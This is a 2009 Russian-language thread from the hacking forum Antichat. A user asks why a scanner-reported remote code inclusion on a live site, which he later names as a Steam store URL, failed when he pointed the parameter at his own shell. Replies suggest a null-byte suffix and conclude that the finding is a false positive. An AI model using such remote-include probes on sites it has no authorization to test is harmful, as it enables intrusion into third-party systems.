ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Выполнение кода с удаленного сервера
  #1  
Старый 05.01.2009, 16:44
Аватар для diznt
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию Выполнение кода с удаленного сервера

И так я создаю новую тему и не судите меня да не судимы будете (так как мне наврятли ответят в теме специальной) лан начнем...
И так насканил (xspider прогой) я тут сайт там обнаружилась серьезная уязвимость с описанием таким вот

" Возможно выполнение атаки "Code Injection". Это может позволить атакующему выполнить произвольный код на вашей системе, взятый с удаленного сервера.

Запрос для выполнения атаки:

http://sait.com/news/?filter=http://wwwwwwww/ "

что еще за код инжект? я сначало подумал(прочитав описание) что нужно указывать путь до шелла вместо "http://wwwwwww/" но указав путь до моего шелла (хост не поддерживает php) шелл был как и в .txt формате как и .php (просто я уже не помню в каком формате надо указывать) у меня ничего не вышло..... Есть какие идеи? Или это не может быть вообще уязв?

Последний раз редактировалось diznt; 05.01.2009 в 16:52..
 
Ответить с цитированием

  #2  
Старый 07.01.2009, 12:41
Аватар для diznt
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

да я так тоже думаю
там аж нету ошибки на сайте если ставить всякие слеши в том случае
но все таки интересует!
 
Ответить с цитированием

  #3  
Старый 07.01.2009, 12:46
Аватар для Tigger
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Не факт, что ошибка появится.
А скорее всего XSpider просто ошибся.
 
Ответить с цитированием

  #4  
Старый 08.01.2009, 11:44
Аватар для diehard
diehard
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
Провел на форуме:
2590715

Репутация: 659


Отправить сообщение для diehard с помощью ICQ
По умолчанию

Пробуй тот же запрос с "ядовитым нулём" на конце: %00
 
Ответить с цитированием

  #5  
Старый 08.01.2009, 12:09
Аватар для diznt
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

diehard да не это спайдер ошибся так как он ща почему то не выдает такую ошибку при скане (вроде как) не помогает все равно
 
Ответить с цитированием

  #6  
Старый 08.01.2009, 14:19
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Ссылку в студию, и посмотрим.
 
Ответить с цитированием

  #7  
Старый 08.01.2009, 14:49
Аватар для diznt
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

http://store.steampowered.com/news/?filter=http://wwwwwwww/&appids=440

произошло все тут а точнее выдал такую вот сылку в спайдере
 
Ответить с цитированием

  #8  
Старый 08.01.2009, 15:10
Аватар для preda1or
preda1or
Участник форума
Регистрация: 27.10.2008
Сообщений: 278
Провел на форуме:
1495545

Репутация: 242
Отправить сообщение для preda1or с помощью ICQ
По умолчанию

Цитата:
Сообщение от diznt  
http://store.steampowered.com/news/?filter=http://wwwwwwww/&appids=440

произошло все тут а точнее выдал такую вот сылку в спайдере
нет там инклуда...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ошибки Windows 2 SVipeR Windows 9 02.03.2009 19:28
Ошибки Windows dinar_007 Windows 19 01.07.2007 13:32
софт для удаленного сервера _lolik_ Уязвимости 6 05.02.2006 10:58
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
Внедрение Sql кода с завязанными глазами, часть 2 k00p3r Чужие Статьи 0 12.06.2005 20:45



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ